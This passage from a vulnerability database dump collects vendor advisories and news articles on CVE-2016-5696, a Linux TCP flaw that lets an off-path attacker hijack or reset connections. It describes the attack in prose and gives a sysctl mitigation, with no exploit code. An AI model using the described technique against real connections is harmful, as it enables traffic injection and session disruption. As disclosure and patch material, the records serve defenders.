kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nIt was found that the RFC 5961 challenge ACK rate limiting as implemented \nin the Linux kernel's networking subsystem allowed an off-path attacker to \nleak certain information about a given connection by creating congestion on \nthe global challenge ACK rate limit counter and then measuring the changes \nby probing packets. An off-path attacker could use this flaw to either \nterminate TCP connection and/or inject payload into non-secured TCP \nconnection between two endpoints on the network. 
(CVE-2016-5696, Important)\n\nRed Hat would like to thank Yue Cao from Cyber Security Group in the CS\ndepartment of University of California, Riverside, for reporting this issue.", "modified": "2018-06-07T08:58:25", "published": "2016-08-18T19:32:31", "id": "RHSA-2016:1631", "href": "https://access.redhat.com/errata/RHSA-2016:1631", "type": "redhat", "title": "(RHSA-2016:1631) Important: realtime-kernel security and bug fix update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:31", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nIt was found that the RFC 5961 challenge ACK rate limiting as implemented \nin the Linux kernel's networking subsystem allowed an off-path attacker to \nleak certain information about a given connection by creating congestion on \nthe global challenge ACK rate limit counter and then measuring the changes \nby probing packets. An off-path attacker could use this flaw to either \nterminate TCP connection and/or inject payload into non-secured TCP \nconnection between two endpoints on the network. 
(CVE-2016-5696, Important)\n\nRed Hat would like to thank Yue Cao from Cyber Security Group in the CS department of University of California, Riverside, for reporting this issue.", "modified": "2018-04-12T03:32:54", "published": "2016-08-18T19:37:10", "id": "RHSA-2016:1633", "href": "https://access.redhat.com/errata/RHSA-2016:1633", "type": "redhat", "title": "(RHSA-2016:1633) Important: kernel security and bug fix update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* It was found that the RFC 5961 challenge ACK rate limiting as implemented in the Linux kernel's networking subsystem allowed an off-path attacker to leak certain information about a given connection by creating congestion on the global challenge ACK rate limit counter and then measuring the changes by probing packets. An off-path attacker could use this flaw to either terminate TCP connection and/or inject payload into non-secured TCP connection between two endpoints on the network. (CVE-2016-5696, Important)\n\nRed Hat would like to thank Yue Cao (Cyber Security Group of the CS department of University of California in Riverside) for reporting this issue.\n\nBug Fix(es):\n\n* When an interrupt request occurred and the new API was scheduled on a different CPU, the enic driver previously generated a warning message. This behavior was caused by a race condition between the vnic_intr_unmask() function and the enic_poll_unlock_napi() function. This update fixes the napi_poll() function to unlock before unmasking the interrupt. As a result, the warning message no longer occurs in the described situation. 
(BZ#1351192)", "modified": "2016-09-06T13:28:58", "published": "2016-09-06T13:18:56", "id": "RHSA-2016:1815", "href": "https://access.redhat.com/errata/RHSA-2016:1815", "type": "redhat", "title": "(RHSA-2016:1815) Important: kernel security and bug fix update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "suse": [{"lastseen": "2016-12-09T17:30:02", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6480", "CVE-2016-5696", "CVE-2016-7425", "CVE-2016-6828", "CVE-2015-7513", "CVE-2016-4997", "CVE-2013-4312", "CVE-2016-5195", "CVE-2016-3841", "CVE-2016-0823", "CVE-2016-4998"], "edition": 1, "description": "The SUSE Linux Enterprise 11 SP4 RT kernel was updated to receive various\n security and bugfixes.\n\n This feature was added:\n\n - Support for the 2017 Intel Purley platform.\n\n The following security bugs were fixed:\n\n - CVE-2016-5195: A local privilege escalation using MAP_PRIVATE was fixed,\n which is reportedly exploited in the wild (bsc#1004418).\n - CVE-2016-0823: The pagemap_open function in fs/proc/task_mmu.c in the\n Linux kernel allowed local users to obtain sensitive physical-address\n information by reading a pagemap file, aka Android internal bug 25739721\n (bnc#994759).\n - CVE-2016-3841: The IPv6 stack in the Linux kernel mishandled options\n data, which allowed local users to gain privileges or cause a denial of\n service (use-after-free and system crash) via a crafted sendmsg system\n call (bnc#992566).\n - CVE-2016-6828: Use after free in tcp_xmit_retransmit_queue or other tcp_\n functions (bsc#994296)\n - CVE-2016-5696: net/ipv4/tcp_input.c in the Linux kernel did not properly\n determine the rate of challenge ACK segments, which made it easier for\n man-in-the-middle attackers to hijack TCP sessions via a blind in-window\n attack (bnc#989152)\n - CVE-2016-6480: Race condition in the ioctl_send_fib function in\n drivers/scsi/aacraid/commctrl.c in the Linux kernel allowed local users\n to cause a denial of service 
(out-of-bounds access or system crash) by\n changing a certain size value, aka a "double fetch" vulnerability\n (bnc#991608)\n - CVE-2016-4997: The compat IPT_SO_SET_REPLACE and IP6T_SO_SET_REPLACE\n setsockopt implementations in the netfilter subsystem in the Linux\n kernel allowed local users to gain privileges or cause a denial of\n service (memory corruption) by leveraging in-container root access to\n provide a crafted offset value that triggers an unintended decrement\n (bnc#986362).\n - CVE-2015-7513: arch/x86/kvm/x86.c in the Linux kernel did not reset the\n PIT counter values during state restoration, which allowed guest OS\n users to cause a denial of service (divide-by-zero error and host OS\n crash) via a zero value, related to the kvm_vm_ioctl_set_pit and\n kvm_vm_ioctl_set_pit2 functions (bnc#960689).\n - CVE-2013-4312: The Linux kernel allowed local users to bypass\n file-descriptor limits and cause a denial of service (memory\n consumption) by sending each descriptor over a UNIX socket and then closing it,\n related to net/unix/af_unix.c and net/unix/garbage.c (bnc#839104).\n - CVE-2016-7425: A buffer overflow in the Linux Kernel in\n arcmsr_iop_message_xfer() could have caused kernel heap corruption and\n arbitrary kernel code execution (bsc#999932)\n\n The following non-security bugs were fixed:\n\n - ahci: Order SATA device IDs for codename Lewisburg.\n - AHCI: Remove obsolete Intel Lewisburg SATA RAID device IDs.\n - ALSA: hda - Add Intel Lewisburg device IDs Audio.\n - avoid dentry crash triggered by NFS (bsc#984194).\n - blktap2: eliminate deadlock potential from shutdown path (bsc#909994).\n - blktap2: eliminate race from deferred work queue handling (bsc#911687).\n - bonding: always set recv_probe to bond_arp_rcv in arp monitor\n (bsc#977687).\n - bonding: fix bond_arp_rcv setting and arp validate desync state\n (bsc#977687).\n - btrfs: account for non-CoW'd blocks in btrfs_abort_transaction\n (bsc#983619).\n - btrfs: ensure that file descriptor used 
with subvol ioctls is a dir\n (bsc#999600).\n - cdc-acm: added sanity checking for probe() (bsc#993891).\n - cxgb4: Set VPD size so we can read both VPD structures (bsc#976867).\n - Delete patches.fixes/net-fix-crash-due-to-wrong-dev-in-calling.patch.\n (bsc#979514)\n - fs/cifs: fix wrongly prefixed path to root (bsc#963655, bsc#979681)\n - fs/select: add vmalloc fallback for select(2) (bsc#1000189).\n - fs/select: introduce SIZE_MAX (bsc#1000189).\n - i2c: i801: add Intel Lewisburg device IDs.\n - include/linux/mmdebug.h: should include linux/bug.h (bnc#971975 VM\n performance -- git fixes).\n - increase CONFIG_NR_IRQS 512 -> 2048 reportedly irq error with multiple\n nvme and tg3 in the same machine is resolved by increasing\n CONFIG_NR_IRQS (bsc#998399)\n - kabi, unix: properly account for FDs passed over unix sockets\n (bnc#839104).\n - kaweth: fix firmware download (bsc#993890).\n - kaweth: fix oops upon failed memory allocation (bsc#993890).\n - KVM: x86: SYSENTER emulation is broken (bsc#994618).\n - libfc: sanity check cpu number extracted from xid (bsc#988440).\n - lpfc: call lpfc_sli_validate_fcp_iocb() with the hbalock held\n (bsc#951392).\n - md: lockless I/O submission for RAID1 (bsc#982783).\n - mm: thp: fix SMP race condition between THP page fault and MADV_DONTNEED\n (VM Functionality, bnc#986445).\n - mpt2sas, mpt3sas: Fix panic when aer correct error occurred (bsc#997708).\n - net: add pfmemalloc check in sk_add_backlog() (bnc#920016).\n - netback: fix flipping mode (bsc#996664).\n - nfs: Do not drop directory dentry which is in use (bsc#993127).\n - nfs: Don't disconnect open-owner on NFS4ERR_BAD_SEQID (bsc#989261).\n - nfs: Don't write enable new pages while an invalidation is proceeding\n (bsc#999584).\n - nfs: Fix a regression in the read() syscall (bsc#999584).\n - nfs: Fix races in nfs_revalidate_mapping (bsc#999584).\n - nfs: fix the handling of NFS_INO_INVALID_DATA flag in\n nfs_revalidate_mapping (bsc#999584).\n - nfs: Fix writeback 
performance issue on cache invalidation (bsc#999584).\n - nfs: Refresh open-owner id when server says SEQID is bad (bsc#989261).\n - nfsv4: do not check MAY_WRITE access bit in OPEN (bsc#985206).\n - nfsv4: fix broken patch relating to v4 read delegations (bsc#956514,\n bsc#989261, bsc#979595).\n - nfsv4: Fix range checking in __nfs4_get_acl_uncached and\n __nfs4_proc_set_acl (bsc#982218).\n - pci: Add pci_set_vpd_size() to set VPD size (bsc#976867).\n - pciback: fix conf_space read/write overlap check.\n - powerpc: add kernel parameter iommu_alloc_quiet (bsc#994926).\n - ppp: defer netns reference release for ppp channel (bsc#980371).\n - random32: add prandom_u32_max (bsc#989152).\n - rpm/constraints.in: Bump x86 disk space requirement to 20GB Clamav tends\n to run out of space nowadays.\n - s390/dasd: fix hanging device after clear subchannel (bnc#994436).\n - sata: Adding Intel Lewisburg device IDs for SATA.\n - sched/core: Fix an SMP ordering race in try_to_wake_up() vs. schedule()\n (bnc#1001419).\n - sched/core: Fix a race between try_to_wake_up() and a woken up task\n (bnc#1002165).\n - sched: Fix possible divide by zero in avg_atom() calculation\n (bsc#996329).\n - scsi_dh_rdac: retry inquiry for UNIT ATTENTION (bsc#934760).\n - scsi: do not print "reservation conflict" for TEST UNIT READY\n (bsc#984102).\n - scsi: ibmvfc: add FC Class 3 Error Recovery support (bsc#984992).\n - scsi: ibmvfc: Fix I/O hang when port is not mapped (bsc#971989)\n - scsi: ibmvfc: Set READ FCP_XFER_READY DISABLED bit in PRLI (bsc#984992).\n - scsi_scan: Send TEST UNIT READY to LUN0 before LUN scanning\n (bnc#843236,bsc#989779).\n - tmpfs: change final i_blocks BUG to WARNING (bsc#991923).\n - Update\n patches.drivers/fcoe-0102-fcoe-ensure-that-skb-placed-on-the-fip_recv_list-\n are.patch (add bsc#732582 reference).\n - USB: fix typo in wMaxPacketSize validation (bsc#991665).\n - USB: validate wMaxPacketValue entries in endpoint descriptors\n (bnc#991665).\n - vlan: don't deliver 
frames for unknown vlans to protocols (bsc#979514).\n - vlan: mask vlan prio bits (bsc#979514).\n - xenbus: inspect the correct type in xenbus_dev_request_and_reply().\n - xen: x86/mm/pat, /dev/mem: Remove superfluous error message (bsc#974620).\n - xfs: Avoid grabbing ilock when file size is not changed (bsc#983535).\n - xfs: Silence warnings in xfs_vm_releasepage() (bnc#915183 bsc#987565).\n\n", "modified": "2016-12-09T18:11:19", "published": "2016-12-09T18:11:19", "id": "SUSE-SU-2016:3069-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-12/msg00033.html", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:26", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "kernel-uek\n[3.8.13-118.10.2]\n- tcp: make challenge acks less predictable (Eric Dumazet) [Orabug: 24010012] [Orabug: 2401010] {CVE-2016-5696}\n[3.8.13-118.10.1]\n- ocfs2: call ocfs2_journal_access_di() before ocfs2_journal_dirty() in ocfs2_write_end_nolock() (yangwenfang) [Orabug: 19601200] \n- ocfs2: improve recovery performance (Junxiao Bi) [Orabug: 24395691] ", "edition": 4, "modified": "2016-08-15T00:00:00", "published": "2016-08-15T00:00:00", "id": "ELSA-2016-3595", "href": "http://linux.oracle.com/errata/ELSA-2016-3595.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:30", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "- [3.10.0-327.28.3.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-327.28.3]\n- [net] tcp: enable per-socket rate limiting of all 'challenge acks' (Florian Westphal) [1355603 1355605] {CVE-2016-5696}\n- [net] tcp: uninline tcp_oow_rate_limited() (Florian Westphal) [1355603 1355605] {CVE-2016-5696}\n- [net] 
tcp: make challenge acks less predictable (Florian Westphal) [1355603 1355605] {CVE-2016-5696}", "edition": 4, "modified": "2016-08-18T00:00:00", "published": "2016-08-18T00:00:00", "id": "ELSA-2016-1633", "href": "http://linux.oracle.com/errata/ELSA-2016-1633.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:00", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "kernel-uek\n[4.1.12-37.6.3]\n- tcp: make challenge acks less predictable (Eric Dumazet) [Orabug: 24010103] [Orabug: 2401010] {CVE-2016-5696}", "edition": 4, "modified": "2016-08-15T00:00:00", "published": "2016-08-15T00:00:00", "id": "ELSA-2016-3594", "href": "http://linux.oracle.com/errata/ELSA-2016-3594.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:52", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "[2.6.32-642.4.2]\n- [net] tcp: make challenge acks less predictable (Florian Westphal) [1355606 1355607] {CVE-2016-5696}\n[2.6.32-642.4.1]\n- [ipmi] Remove smi_msg from waiting_rcv_msgs list before handle_one_recv_msg() (David Arcari) [1355980 1347189]\n- [fs] ext4: Remove useless spinlock in ext4_getattr() (Lukas Czerner) [1355981 1315933]\n- [net] tcp: increase size at which tcp_bound_to_half_wnd bounds to > TCP_MSS_DEFAULT (Davide Caratti) [1354446 1349776]\n- [net] tcp: Prevent overzealous packetization by SWS logic (Davide Caratti) [1354446 1349776]\n- [fs] configfs: fix race between dentry put and lookup (Robert S Peterson) [1353828 1333448]\n- [drm] move idr2 implementation to lib (Milos Vyletel) [1353827 1316790]\n- [fs] cifs: Create dedicated keyring for spnego operations (Scott Mayhew) [1351670 1267754]\n- [infiniband] srp: Fix backport error in ib_srp::srp_queuecommand (Don Dutile) [1348062 
1321094]\n- [fs] gfs2: don't set rgrp gl_object until it's inserted into rgrp tree (Robert S Peterson) [1347539 1344740]\n- [sched] avoid kernel panic during power off (Frank Ramsay) [1343894 1313035]", "edition": 4, "modified": "2016-08-23T00:00:00", "published": "2016-08-23T00:00:00", "id": "ELSA-2016-1664", "href": "http://linux.oracle.com/errata/ELSA-2016-1664.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "huawei": [{"lastseen": "2019-02-01T18:01:40", "bulletinFamily": "software", "cvelist": ["CVE-2016-5696"], "description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2017-07-05T00:00:00", "published": "2016-09-07T00:00:00", "id": "HUAWEI-SA-20160907-01-TCP", "href": "https://www.huawei.com/en/psirt/security-advisories/2016/huawei-sa-20160907-01-tcp-en", "title": "Security Advisory - TCP Connection Hijack Vulnerability", "type": "huawei", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "thn": [{"lastseen": "2018-01-27T09:18:10", "bulletinFamily": "info", "cvelist": ["CVE-2016-5696"], "description": "[](<https://4.bp.blogspot.com/-hEDa0CCUvq0/V6xQv40SogI/AAAAAAAApJE/_BPwDkHfi1c_pfqMblsyaLu5HvFLnCeCQCLcB/s1600/linux-server-tcp-packet-hacking.png>)\n\nIf you are using the Internet, there are the possibilities that you are open to attack. 
\n \nThe Transmission Control Protocol (TCP) implementation in all Linux systems deployed since 2012 (_version 3.6 and above of the Linux kernel_) poses a serious threat to Internet users, whether or not they use Linux directly. \n \nThis issue is troubling because Linux is used widely across the Internet, from web servers to Android smartphones, tablets, and smart TVs. \n \nResearchers have uncovered a serious Internet flaw, which if exploited, could allow attackers to terminate or inject malware into unencrypted communication between any two vulnerable machines on the Internet. \n \nThe vulnerability could also be used to forcefully terminate HTTPS encrypted connections and downgrade the privacy of secure connections, as well as also threatens anonymity of Tor users by routing them to certain malicious relays. \n \nThe flaw actually resides in the design and implementation of the **Request for Comments: 5961** ([RFC 5961](<https://tools.ietf.org/html/rfc5961>)) \u2013 a relatively new Internet standard that's designed to make commonly used TCP more robust against hacking attacks. \n \nTCP protocol is the heart of all Internet communications, as all application level protocols, including HTTP, FTP, SSH, Telnet, DNS, and SMTP, stand on TCP. \n \nWeb servers and other applications make use of TCP protocol to establish connections between hosts to transfer data between them. \n \nA team of six security researchers from the University of California, Riverside and the U.S. Army Research Laboratory has demonstrated a [proof-of-concept exploit](<https://www.usenix.org/conference/usenixsecurity16/technical-sessions/presentation/cao>) at the USENIX Security Symposium that can be used to detect if two hosts are communicating over TCP and ultimately attack that traffic. 
\n \n\n\n### No Need for a Man-in-the-Middle Position\n\n[](<https://1.bp.blogspot.com/-NZwt4F_trEI/V6xJI7sa8BI/AAAAAAAApI0/FDCNjFwJYvApMupzfHdfP9NvEs9mqE1gQCLcB/s1600/linux-tcp-hacking.png>)\n\nTypically, the TCP protocol assembles messages into a series of data packets that are identified by unique sequence numbers and transmitted to the receiver. When received, the data packets are then reassembled by the receiver into the original message. \n \nResearchers found that a **side-channel** attack allows hackers to accurately guess the TCP sequence numbers of a connection within the first 10 seconds of the attack, using no more information than the IP addresses of both parties. \n \nThis means an attacker using a spoofed IP address does not need a man-in-the-middle (MITM) position: without ever seeing the traffic, an off-path attacker can reset a connection or inject malicious TCP packets into it between any two arbitrary machines on the Internet. \n \nThe researchers detailed their findings in the paper titled, '**Off-Path TCP Exploits: Global Rate Limit Considered Dangerous**' [[PDF](<http://www.cs.ucr.edu/~zhiyunq/pub/sec16_TCP_pure_offpath.pdf>)], which they presented at the conference, showing the audience how they injected a phishing form inside the USA Today website. \n\n\nYou can watch the video demonstration above that shows the attack in action. \n \n\n\n### Targeting the Tor Network\n\n \nThe researchers also show how the flaw ([CVE-2016-5696](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5696>)) can be exploited to break Secure Shell (SSH) connections and disrupt encrypted communications traveling over the Tor anonymity network (an off-path attacker can reset such connections, but cannot inject meaningful data into their encrypted payload). \n\n\n> \"In general, we believe that a DoS [Denial of Service] attack against Tor connections can have a devastating impact on both the availability of the service as a whole and the privacy guarantees that it can provide,\" the paper reads. 
\n\n> \"The default policy in Tor is that if a connection is down between two relay nodes, say a middle relay and an exit relay, the middle relay will pick a different exit relay to establish the next connection. If an attacker can dictate which connections are down (via reset attacks), then the attacker can potentially force the use of certain exit relays.\"\n\nThe team also provided recommendations on how to mitigate the attack. \n \n\n\n### Here's How to Mitigate TCP Attack\n\n \nWhile patches to fix the vulnerability are developed and distributed for the current Linux kernel, as a workaround you can raise the ACK rate limit on your Linux machine or gadget to large values so that it cannot be reached. \n \nFor this, you are required to append the following to /etc/sysctl.conf: \n\n\n> net.ipv4.tcp_challenge_ack_limit = 999999999\n\nOnce done, use sysctl -p to activate the new rule. You need to perform root to do this. \n \nThe researchers also note that while Linux version 3.6 and above are vulnerable to this attack, Windows, OS X and FreeBSD are not believed to be vulnerable because they have not yet fully implemented RFC 5961.\n", "modified": "2016-08-11T13:03:17", "published": "2016-08-10T23:18:00", "id": "THN:B41554BF406DE03F01F4B7A7E4CD2A52", "href": "https://thehackernews.com/2016/08/linux-tcp-packet-hacking.html", "type": "thn", "title": "Linux TCP Flaw allows Hackers to Hijack Internet Traffic and Inject Malware Remotely", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-27T10:06:50", "bulletinFamily": "info", "cvelist": ["CVE-2016-5696"], "description": "[](<https://1.bp.blogspot.com/-BTKum11v1d8/V7MHT6Vy7OI/AAAAAAAApMU/v_XnTsEnvwA5lzrZWm6ya46y9oEe9AMSACLcB/s1600/android-hack-linux.png>)\n\nAn estimated 80 percent of Android smartphones and tablets running Android 4.4 KitKat and higher are vulnerable to a recently disclosed [Linux kernel 
flaw](<https://thehackernews.com/2016/08/linux-tcp-packet-hacking.html>) that allows hackers to terminate connections, spy on unencrypted traffic or inject malware into the parties' communications. \n \nEven the latest [Android Nougat](<https://thehackernews.com/2016/03/google-android-n-features.html>) Preview is considered to be vulnerable. \n \nThe security flaw first appeared in the implementation of the TCP protocol in all Linux systems deployed since 2012 (version 3.6 and above of the Linux OS kernel) and the Linux Foundation has already patched the Linux kernel on July 11, 2016. \n \nHowever, the vulnerability ([CVE-2016-5696](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5696>)) is now affecting a large portion of the Android ecosystem. \n \nAccording to a [blog post](<https://blog.lookout.com/blog/2016/08/15/linux-vulnerability-android/>) published Monday by mobile security firm Lookout, the Linux flaw is present in Android version 4.4 KitKat and all later releases, including the latest developer preview of [Android Nougat](<https://thehackernews.com/2016/06/android-n-nougat-nutella.html>). \n \n\n\n### Around 1.4 BILLLLLION Android Devices Affected\n\n \nThis means that 80% of all Android devices in use today, which is nearly 1.4 Billion devices, are vulnerable to attacks, enabling hackers to spy on your communications without even compromising your network via a man-in-the-middle attack. \n \nHowever, the good news is that the Linux vulnerability is complicated and difficult to exploit, but the risk is there, especially for targeted attacks. \n\n\n> \"While a man-in-the-middle attack is not required here, the attacker still needs to know a source and destination IP address to successfully execute the attack,\" Lookout stated in the blog post.\n\nWindows and Macs are not affected by the vulnerability. 
\n \nAccording to Google, engineers are already aware of the vulnerability and are _\"taking the appropriate actions\" _to fix the issue, a Google representative [told](<https://arstechnica.com/security/2016/08/linux-bug-leaves-1-4-billion-android-users-vulnerable-to-hijacking-attacks/>) Ars Technica. So, it is likely that a patch for Android will arrive soon. \n \n\n\n### Temporary Mitigation:\n\n * Make sure your Internet traffic is encrypted: Apps you use and Websites you visit should employ HTTPS.\n * Use a Virtual Private Network (VPN).\nTo know more about the Linux kernel flaw and its mitigation, you can head on to our post, titled \"[Linux TCP Flaw allows Hackers to Hijack Internet Traffic and Inject Malware Remotely](<https://thehackernews.com/2016/08/linux-tcp-packet-hacking.html>).\"\n", "modified": "2016-08-16T12:37:16", "published": "2016-08-16T01:31:00", "id": "THN:4FE2068BDC86E2EECDC3F2C86932F8F2", "href": "https://thehackernews.com/2016/08/hack-linux-android.html", "type": "thn", "title": "Internet Traffic Hijacking Linux Flaw Affects 80% of Android Devices", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "A security issue has been found in the Linux kernel's implementation of\nchallenge ACKs as specified in RFC 5961. 
An attacker who knows a\nconnection's client IP, server IP and server port can abuse the\nchallenge ACK mechanism to determine the accuracy of a normally 'blind'\nattack on the client or server.\n\nSuccessful exploitation of this flaw could allow a remote attacker to\ninject into or control the contents of a TCP stream in a connection between a Linux\ndevice and its connected client/server.", "modified": "2016-08-14T00:00:00", "published": "2016-08-14T00:00:00", "id": "ASA-201608-12", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-August/000686.html", "type": "archlinux", "title": "linux: information disclosure", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T18:44:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "A security issue has been found in the Linux kernel's implementation of\nchallenge ACKs as specified in RFC 5961. An attacker who knows a\nconnection's client IP, server IP and server port can abuse the\nchallenge ACK mechanism to determine the accuracy of a normally 'blind'\nattack on the client or server.\n\nSuccessful exploitation of this flaw could allow a remote attacker to\ninject into or control the contents of a TCP stream in a connection between a Linux\ndevice and its connected client/server.", "modified": "2016-08-17T00:00:00", "published": "2016-08-17T00:00:00", "id": "ASA-201608-15", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-August/000689.html", "type": "archlinux", "title": "linux-zen: information disclosure", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T18:44:47", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "A security issue has been found in the Linux kernel's implementation of\nchallenge ACKs as specified in RFC 5961. 
An attacker who knows a\nconnection's client IP, server IP and server port can abuse the\nchallenge ACK mechanism to determine the accuracy of a normally 'blind'\nattack on the client or server.\n\nSuccessful exploitation of this flaw could allow a remote attacker to\ninject into or control the contents of a TCP stream in a connection between a Linux\ndevice and its connected client/server.", "modified": "2016-08-14T00:00:00", "published": "2016-08-14T00:00:00", "id": "ASA-201608-13", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-August/000687.html", "type": "archlinux", "title": "linux-grsec: information disclosure", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T18:44:35", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "A security issue has been found in the Linux kernel's implementation of\nchallenge ACKs as specified in RFC 5961. An attacker who knows a\nconnection's client IP, server IP and server port can abuse the\nchallenge ACK mechanism to determine the accuracy of a normally 'blind'\nattack on the client or server.\n\nSuccessful exploitation of this flaw could allow a remote attacker to\ninject into or control the contents of a TCP stream in a connection between a Linux\ndevice and its connected client/server.", "modified": "2016-08-21T00:00:00", "published": "2016-08-21T00:00:00", "id": "ASA-201608-17", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-August/000691.html", "type": "archlinux", "title": "linux-lts: information disclosure", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "paloalto": [{"lastseen": "2020-12-24T13:20:57", "bulletinFamily": "software", "cvelist": ["CVE-2016-5696"], "description": "A vulnerability exists in the kernel of PAN-OS that may result in Information Disclosure. 
The challenge ACK rate limiting in the kernel's networking subsystem may allow an off-path attacker to leak certain information about a given connection by creating congestion on the global challenge ACK rate limit counter and then measuring the changes by probing packets. (ref # PAN-62500 / CVE-2016-5696).\nSuccessful exploitation of this issue may allow an attacker to terminate a TCP connection or inject a payload into non-secured TCP connection between two endpoints on the network.\nThis issue affects PAN-OS 6.1, PAN-OS 7.0.15 and earlier, PAN-OS 7.1.9 and earlier\n\n\n**Work around:**\nN/A", "edition": 6, "modified": "2017-05-23T03:00:00", "published": "2017-05-23T03:00:00", "id": "PAN-SA-2017-0015", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2016-5696", "title": "Kernel Vulnerability", "type": "paloalto", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:28:35", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5696"], "description": "**CentOS Errata and Security Advisory** CESA-2016:1664\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\nIt was found that the RFC 5961 challenge ACK rate limiting as implemented in the Linux kernel's networking subsystem allowed an off-path attacker to leak certain information about a given connection by creating congestion on the global challenge ACK rate limit counter and then measuring the changes by probing packets. An off-path attacker could use this flaw to either terminate TCP connection and/or inject payload into non-secured TCP connection between two endpoints on the network. (CVE-2016-5696, Important)\n\nRed Hat would like to thank Yue Cao (Cyber Security Group of the CS department of University of California in Riverside) for reporting this issue.\n\nBug Fix(es):\n\n* When loading the Direct Rendering Manager (DRM) kernel module, the kernel panicked if DRM was previously unloaded. 
The kernel panic was caused by a memory leak of the ID Resolver (IDR2). With this update, IDR2 is loaded during kernel boot, and the kernel panic no longer occurs in the described scenario. (BZ#1353827)\n\n* When more than one process attempted to use the \"configfs\" directory entry at the same time, a kernel panic in some cases occurred. With this update, a race condition between a directory entry and a lookup operation has been fixed. As a result, the kernel no longer panics in the described scenario. (BZ#1353828)\n\n* When shutting down the system by running the halt -p command, a kernel panic occurred due to a conflict between the kernel offlining CPUs and the sched command, which used the sched group and the sched domain data without first checking the data. The underlying source code has been fixed by adding a check to avoid the conflict. As a result, the described scenario no longer results in a kernel panic. (BZ#1343894)\n\n* In some cases, running the ipmitool command caused a kernel panic due to a race condition in the ipmi message handler. This update fixes the race condition, and the kernel panic no longer occurs in the described scenario. (BZ#1355980)\n\n* Previously, multiple Very Secure FTP daemon (vsftpd) processes on a directory with a large number of files led to a high contention rate on each inode's spinlock, which caused excessive CPU usage. With this update, a spinlock to protect a single memory-to-memory copy has been removed from the ext4_getattr() function. As a result, system CPU usage has been reduced and is no longer excessive in the described situation. (BZ#1355981)\n\n* When the gfs2_grow utility is used to extend Global File System 2 (GFS2), the next block allocation causes the GFS2 kernel module to re-read its resource group index. 
